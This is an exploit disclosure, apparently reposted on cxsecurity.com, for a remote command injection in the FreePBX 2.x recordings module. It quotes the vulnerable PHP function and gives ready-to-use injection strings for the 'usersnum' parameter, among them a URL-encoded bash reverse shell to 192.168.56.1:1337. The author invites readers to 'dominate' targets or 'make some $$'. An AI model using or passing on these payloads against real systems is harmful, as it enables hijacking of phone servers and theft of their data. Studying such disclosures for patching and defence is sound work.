FreePBX 2.x Remote Command Execution

2014.02.25
Credit: i-Hmx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

App : Freepbx 2.x Download : schmoozecom.net Auther : i-Hmx Mail : n0p1337@gmail.com Home : security arrays inc. , sec4ever.com , exploit4arab.net And again , while the distro is widely user , Schmoozecom staff not giving it enough attention , all they provided for the distro is adding the schmoozecom fancy logo and "Developed by schmoozecom" Teraraa :/ What ever, Freepbx suffer from another command execution vuln , not so critical but perhaps many people gonna be interested abt it as it can be used to dump plaintext data from the PBX Box ;) Vulnerable function "recording_addpage" @ admin/modules/recordings/page.recordings.php function recording_addpage($usersnum) { global $fc_save; global $fc_check; global $recordings_save_path; ?> <div class="content"> <h2><?php echo _("System Recordings")?></h2> <h3><?php echo _("Add Recording") ?></h3> <h5><?php echo _("Step 1: Record or upload")?></h5> <?php if (!empty($usersnum)) { echo '<p>'; echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._(" dial")."&nbsp;".$fc_save." <span>"; echo _("Start speaking at the tone. Press # when finished.")."</span></a>"; echo _("and speak the message you wish to record. Press # when finished.")."\n"; echo '</p>'; } else { ?> <form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>" method="post"> <input type="hidden" name="display" value="recordings"> <?php echo _("If you wish to make and verify recordings from your phone, please enter your extension number here:"); ?> <input type="text" size="6" name="usersnum" tabindex="<?php echo ++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo _("Go"); ?>" tabindex="<?php echo ++$tabindex;?>"> </form> <?php } ?> <p></p> <form enctype="multipart/form-data" name="upload" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST"> <?php echo _("Alternatively, upload a recording in any supported asterisk format. Note that if you're using .wav, (eg, recorded with Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at 8000Hz")?>:<br> <input type="hidden" name="display" value="recordings"> <input type="hidden" name="action" value="recordings_start"> <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>"> <input type="file" name="ivrfile" tabindex="<?php echo ++$tabindex;?>"/> <input type="button" value="<?php echo _("Upload")?>" onclick="document.upload.submit(upload);alert('<?php echo addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php echo ++$tabindex;?>"/> </form> <?php if (isset($_FILES['ivrfile']['tmp_name']) && is_uploaded_file($_FILES['ivrfile']['tmp_name'])) { if (empty($usersnum) || !ctype_digit($usersnum)) { $dest = "unnumbered-"; } else { $dest = "{$usersnum}-"; } $suffix = preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'], "."), 1)); $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix; move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename); system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " . $destfilename); system("chmod g+rw ".$destfilename); echo "<h6>"._("Successfully uploaded")." ".$_FILES['ivrfile']['name']."</h6>"; $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.'); } ?> <form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>" method="post" onsubmit="return rec_onsubmit();"> <input type="hidden" name="action" value="recorded"> <input type="hidden" name="display" value="recordings"> <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>"> <?php if (!empty($usersnum)) { ?> <h5><?php echo _("Step 2: Verify")?></h5> <p> <?php echo _("After recording or uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to listen to your recording.")?> </p> <p> <?php echo _("If you wish to re-record your message, dial")."&nbsp;".$fc_save; ?></p> <h5><?php echo _("Step 3: Name")?> </h5> <?php } else { echo "<h5>"._("Step 2: Name")."</h5>"; } ?> <table style="text-align:right;"> <tr valign="top"> <td valign="top"><?php echo _("Name this Recording")?>: </td> <td style="text-align:left"><input type="text" name="rname" value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td> </tr> </table> <h6><?php echo _("Click \"SAVE\" when you are satisfied with your recording"); echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?> <input name="Submit" type="submit" value="<?php echo _("Save")?>" tabindex="<?php echo ++$tabindex;?>"></h6> <?php recordings_form_jscript(); ?> </form> </div> <?php } Actually as you can see there are many exploitable lines there , but here am interested about this line system("chmod g+rw ".$destfilename); if you traced the function flow you will notice that 'destfilename' get part of his value from the parameter $_REQUEST['usersnum'] the function is called via Target/admin/config.php?type=setup&display=recordings before uploading open firebug search for usersnum edit value to fa;id>faris;fax or , for backconnetion use fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris and you are ready to dominate , or even make some $$ if you r interested ;) Have a good day

References:

http://cxsecurity.com/issue/WLB-2014020116


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top